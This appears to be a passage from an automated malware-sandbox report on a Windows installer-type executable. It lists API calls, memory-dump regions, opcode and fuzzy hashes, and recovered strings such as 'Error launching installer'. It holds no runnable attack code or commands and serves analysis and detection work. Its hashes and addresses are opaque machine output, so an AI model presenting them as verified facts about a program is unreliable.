                                                                                • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                • String ID:
                                                                                • API String ID: 1849352358-0
                                                                                • Opcode ID: 60e0f0a4f4cd1fd9b22debf782eb0323395cc1f2f46e7b7788968bb6fcd6f90b
                                                                                • Instruction ID: 869b35d44be7719ac4f8667573c2d83536e062a508785c5670752e956bf1946f
                                                                                • Opcode Fuzzy Hash: 60e0f0a4f4cd1fd9b22debf782eb0323395cc1f2f46e7b7788968bb6fcd6f90b
                                                                                • Instruction Fuzzy Hash: 1BF0ECB2A04114AFEB01ABE4DD88DAFB7BDEB54305B104476F602F6191C7749D018B79
                                                                                APIs
                                                                                • GetDC.USER32(?), ref: 00401D3B
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                                • CreateFontIndirectA.GDI32(0040A808), ref: 00401DB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                • String ID:
                                                                                • API String ID: 3808545654-0
                                                                                • Opcode ID: 1711f20bd284629642e955f9fcf97280746cc1bdb09c71cfa46585c121ec0b61
                                                                                • Instruction ID: 002072324c9ca14b61f47775792bd0911152047613ce7f91f46ea316c06ba8c0
                                                                                • Opcode Fuzzy Hash: 1711f20bd284629642e955f9fcf97280746cc1bdb09c71cfa46585c121ec0b61
                                                                                • Instruction Fuzzy Hash: 22016232944340AFE7016770AE5EBAA3FA89795305F108479F641B62E2C67801568F6F
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(0041FD30,0041FD30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404758,000000DF,00000000,00000400,?), ref: 004048DB
                                                                                • wsprintfA.USER32 ref: 004048E3
                                                                                • SetDlgItemTextA.USER32(?,0041FD30), ref: 004048F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                • String ID: %u.%u%s%s
                                                                                • API String ID: 3540041739-3551169577
                                                                                • Opcode ID: 82e12f032b3efd850847d5b584d2a8547bd6d54b12269a14f91348113f1031b8
                                                                                • Instruction ID: c0766d521516c7b6303674c7dd8cea214f166acaf9b397f83c092fcb524d35e8
                                                                                • Opcode Fuzzy Hash: 82e12f032b3efd850847d5b584d2a8547bd6d54b12269a14f91348113f1031b8
                                                                                • Instruction Fuzzy Hash: 6A110A736041283BDB0076ADDC45EAF3288DB85374F254637FA65F21D1EA78CC1285E8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: F$F$F$O6$O6
                                                                                • API String ID: 0-1870396516
                                                                                • Opcode ID: b1bc86166187a991202267250b549f5b80bb6436c1870e24d3f63a6a9a4dcb1a
                                                                                • Instruction ID: de97c9caf507bb055e27ff9b01a2cec7bc944ad4eac1d20604c04a49c5743bb5
                                                                                • Opcode Fuzzy Hash: b1bc86166187a991202267250b549f5b80bb6436c1870e24d3f63a6a9a4dcb1a
                                                                                • Instruction Fuzzy Hash: 7921A138E00248AFDB05DFF9C4416AEB7B2FF86308F1080A9D411AB355DB745A06CF92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: F$F$F$O6$O6
                                                                                • API String ID: 0-1870396516
                                                                                • Opcode ID: 6aefcbc1ac2d6abc2a4cd387d62609a14488dd59c5df56fe26617dfd4536bdba
                                                                                • Instruction ID: 90ea785bedd40eb9dcbaabe10a12538e9312ca83afd879cd870bd4754aca0925
                                                                                • Opcode Fuzzy Hash: 6aefcbc1ac2d6abc2a4cd387d62609a14488dd59c5df56fe26617dfd4536bdba
                                                                                • Instruction Fuzzy Hash: 7021B034E00248AFCB05DFF9C8016AEBBB6EFC6304F1484A9D410AB355DB749A05CF92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: F$F$F$O6$O6
                                                                                • API String ID: 0-1870396516
                                                                                • Opcode ID: 348b9770241a00e89426f80f4623f4700f70b0eb658187f4f2dfe73c22e296b9
                                                                                • Instruction ID: acb9ea8ed283dc979fc15d81576c31536e36b1e5698c709c7de21b86cf3a6cea
                                                                                • Opcode Fuzzy Hash: 348b9770241a00e89426f80f4623f4700f70b0eb658187f4f2dfe73c22e296b9
                                                                                • Instruction Fuzzy Hash: 2E219278E002089FCB05EFF9C44169EBBB1FF86305F1484A9D414AB355DBB45A0ACF42
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: F$F$F$O6$O6
                                                                                • API String ID: 0-1870396516
                                                                                • Opcode ID: 6b4d5d0b7fc3d5f3f4fded8bca0f16b38b9b47ad8564005765492586dabfed98
                                                                                • Instruction ID: c196ab001082cdf1b0aa03b9b9520a704f3fdcbbd920340ad00bd0fbfb23ad47
                                                                                • Opcode Fuzzy Hash: 6b4d5d0b7fc3d5f3f4fded8bca0f16b38b9b47ad8564005765492586dabfed98
                                                                                • Instruction Fuzzy Hash: 04219C38E00248AFCB05DFF9C40169EBBB1FF86304F1081A9D010AB355DB745A46CF82
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: F$F$F$O6$O6
                                                                                • API String ID: 0-1870396516
                                                                                • Opcode ID: 9d908a69ea150f9ff37b776b58e836244f6982be86ff468a05249f3eaeb353ff
                                                                                • Instruction ID: 41b28af0b675c2a2c04b19f70165fd682241a7281ead65a97c3d295f2f821272
                                                                                • Opcode Fuzzy Hash: 9d908a69ea150f9ff37b776b58e836244f6982be86ff468a05249f3eaeb353ff
                                                                                • Instruction Fuzzy Hash: 9A215E74E00248AFDB05EFF9C4116AEB7B1EF86308F1084A99414AB395DB745A46CF92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: F$F$F$O6$O6
                                                                                • API String ID: 0-1870396516
                                                                                • Opcode ID: cb8128028deca01c45a030f9ce1aedc44b9b0f2ce0093b85ca5bd95db653ab0e
                                                                                • Instruction ID: 98c0baeca3c4ce2410b5cc58b147e270da738cbe37c1c2a6c1df2f9e2f88c61c
                                                                                • Opcode Fuzzy Hash: cb8128028deca01c45a030f9ce1aedc44b9b0f2ce0093b85ca5bd95db653ab0e
                                                                                • Instruction Fuzzy Hash: FC217F34E00248AFDB05EFF9C4416AE77B2EF86308F1084A9D414AB355CB745A41DF82
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                                                  • Part of subcall function 0040507C: lstrcatA.KERNEL32(0041F510,00402C8E,00402C8E,0041F510,00000000,00000000,00000000), ref: 004050D8
                                                                                  • Part of subcall function 0040507C: SetWindowTextA.USER32(0041F510,0041F510), ref: 004050EA
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                                                • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                • String ID:
                                                                                • API String ID: 2987980305-0
                                                                                • Opcode ID: 65bf581ea8d5edc76cd579bd6d3ffe3d6b8ea4bbd2830e889f51061ae8edc0db
                                                                                • Instruction ID: 215a549463b1ff6cdb2c8ab56b147df35cc58612cba094cab406bca79a610b2d
                                                                                • Opcode Fuzzy Hash: 65bf581ea8d5edc76cd579bd6d3ffe3d6b8ea4bbd2830e889f51061ae8edc0db
                                                                                • Instruction Fuzzy Hash: A0212E76904215FBDF217F648E48A6E3670AB45318F30423BF701B62D0D7BC4942DA6E
                                                                                APIs
                                                                                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                • lstrlenA.KERNEL32(00409C00,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                • RegSetValueExA.ADVAPI32(?,?,?,?,00409C00,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00409C00,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: CloseCreateValuelstrlen
                                                                                • String ID:
                                                                                • API String ID: 1356686001-0
                                                                                • Opcode ID: bc41edd427ba39f31ac915e283dc2059a997cf39f25f2d86e179569400e4595c
                                                                                • Instruction ID: 5da3480c5977201a3ee5f00a5bba4dd76bcb837ef72d2191196963f4bf358416
                                                                                • Opcode Fuzzy Hash: bc41edd427ba39f31ac915e283dc2059a997cf39f25f2d86e179569400e4595c
                                                                                • Instruction Fuzzy Hash: C91175B1E00108BFEB10EFA4DE89EAF7A79EB54358F10403AF505B61D1D7B85D419B28
                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 0040501F
                                                                                • CallWindowProcA.USER32(?,?,?,?), ref: 00405070
                                                                                  • Part of subcall function 00404094: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 004040A6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                • String ID:
                                                                                • API String ID: 3748168415-3916222277
                                                                                • Opcode ID: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
                                                                                • Instruction ID: c10ccb832a2a3496aa312e1d90523b33251ee11bfabb6cbb9dcba6f20acc8f53
                                                                                • Opcode Fuzzy Hash: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
                                                                                • Instruction Fuzzy Hash: ED018471504609ABDF205F61EC80EAF3725EB84754F148037FB01751E2C77A8C929FAA
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00405B19
                                                                                • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 00405B33
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID: CountFileNameTempTick
                                                                                • String ID: nsa
                                                                                • API String ID: 1716503409-2209301699
                                                                                • Opcode ID: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
                                                                                • Instruction ID: 324d89babc139fd35718223d4ac3f7893030d86c2087b7febc7e38ed5d635a65
                                                                                • Opcode Fuzzy Hash: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
                                                                                • Instruction Fuzzy Hash: ABF082367486086BDB109F55EC08B9BBBADDF91750F10C03BFA089A1D0D6B1B9548B59
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 0040561D
                                                                                • CloseHandle.KERNEL32(?), ref: 0040562A
                                                                                Strings
                                                                                • Error launching installer, xrefs: 00405607
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleProcess
                                                                                • String ID: Error launching installer
                                                                                • API String ID: 3712363035-66219284
                                                                                • Opcode ID: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
                                                                                • Instruction ID: f5a249c54adfd8c255b7380a03a9b1716d63bb632b604881324be9db7dcd8e21
                                                                                • Opcode Fuzzy Hash: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
                                                                                • Instruction Fuzzy Hash: EAE0BFB4A002097FEB109B64ED45F7B76ACEB10704F908571BD15F2160D678A9518A79
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8132e083a1160923351ce27f8cc58d18c93b4828372388658a00552e8c1634b1
                                                                                • Instruction ID: 9d08257b753d1dc8d50a425e5d18a9377fc83dd762af72a05302a0d5f43d32a7
                                                                                • Opcode Fuzzy Hash: 8132e083a1160923351ce27f8cc58d18c93b4828372388658a00552e8c1634b1
                                                                                • Instruction Fuzzy Hash: EDA13571E00228CBDB28CFA9C8547ADBBB1FF44305F15816ED856BB281D7785A96CF44
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8cd2b84360dd7c3bf672bcc78a832e40c60aaabd2d33ded0d5d318971a638696
                                                                                • Instruction ID: 4069c4fc72520be48e16bfd385b53c7c255c7f0e47fd3261c7dbfe51bff91a5a
                                                                                • Opcode Fuzzy Hash: 8cd2b84360dd7c3bf672bcc78a832e40c60aaabd2d33ded0d5d318971a638696
                                                                                • Instruction Fuzzy Hash: 0B913470E04228CBEF28CF99C8547ADBBB1FF44305F15816AD856BB291C378A996CF44
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 41c8aa7f72f1f93a2cbcdf9f632d1ef5542b7afda86631119225c1b51720529c
                                                                                • Instruction ID: e16a5cd5122dbeef30614bcf2b0def54f3f28e6aa070a3c0d2e235184150711d
                                                                                • Opcode Fuzzy Hash: 41c8aa7f72f1f93a2cbcdf9f632d1ef5542b7afda86631119225c1b51720529c
                                                                                • Instruction Fuzzy Hash: B1814771E04228CBDF24CFA9C8447ADBBB1FF44305F25816AD856BB281C7789996CF54
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 344cb5358226c0404198c7d180aef45b95627368966a6db8480b9102282d8a8c
                                                                                • Instruction ID: 250af7da94f29308333f8738aaa2927d74ee5fc9a8e658dcecc26e0f3faccd11
                                                                                • Opcode Fuzzy Hash: 344cb5358226c0404198c7d180aef45b95627368966a6db8480b9102282d8a8c
                                                                                • Instruction Fuzzy Hash: A7816631E04228DBDF24CFA9C8447AEBBB1FF44305F11816AD856BB281C7785A96CF54
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2fcb4a8d7ef675eb47b5d59acfe40d72c7d0968365e25b36553ac1c3905db65f
                                                                                • Instruction ID: d3a2940f28ad1956632bfd73bee9eff7b9b7c3d901c1c2bf8e917ae235022c86
                                                                                • Opcode Fuzzy Hash: 2fcb4a8d7ef675eb47b5d59acfe40d72c7d0968365e25b36553ac1c3905db65f
                                                                                • Instruction Fuzzy Hash: 2D713471E00228DBDF24CFA9C8547ADBBB1FF44305F15806AD816BB281C778AA96DF54
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: da2f706e7974a2021bad9ffdb380539c5442a57272a58128905f842303d595e8
                                                                                • Instruction ID: aa5f261e6b50ba4db5ffebf04d3efdb0ff665d1262494a5322ec58a673e68ddc
                                                                                • Opcode Fuzzy Hash: da2f706e7974a2021bad9ffdb380539c5442a57272a58128905f842303d595e8
                                                                                • Instruction Fuzzy Hash: 91715671E00228DBDF28CF99C854BADBBB1FF44305F15806AD816BB281C778A992DF54
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: feb90363471a84b63e8ff2d487282df12a040b782cd1455c92e9c1b62a64594c
                                                                                • Instruction ID: ff328c296e0f6909f1720754cbeef76fe0f6b635d5236ea2459b9db161edb35a
                                                                                • Opcode Fuzzy Hash: feb90363471a84b63e8ff2d487282df12a040b782cd1455c92e9c1b62a64594c
                                                                                • Instruction Fuzzy Hash: 9F715771E00228DBEF28CF99C8547ADBBB1FF44305F15806AD856BB281C778AA56DF44
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: F$F$F$O6
                                                                                • API String ID: 0-2380038390
                                                                                • Opcode ID: 0aba5dff44ebaed76b477513d01c6c5e658969524ad201338c7c2273d5740d15
                                                                                • Instruction ID: 372365850fba0ff4b6e96f69a70d72b08ab82c3ea733ef81997ebf1dd3a7a593
                                                                                • Opcode Fuzzy Hash: 0aba5dff44ebaed76b477513d01c6c5e658969524ad201338c7c2273d5740d15
                                                                                • Instruction Fuzzy Hash: 2F216A34A002589FCB06DFB4D4516AE77B1FF86308F1184A9D4029B345DB789E0ACF92
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A4B
                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A63
                                                                                • CharNextA.USER32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A74
                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A7D
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 190613189-0
                                                                                • Opcode ID: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
                                                                                • Instruction ID: 761e0a114986e2dc795515ee57e72db75caae44d6787476300dd9688655b7936
                                                                                • Opcode Fuzzy Hash: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
                                                                                • Instruction Fuzzy Hash: 2FF06232605518BFC7129FA5DC40D9EBBA8EF16350B2541B5F800F7250D674EE019FA9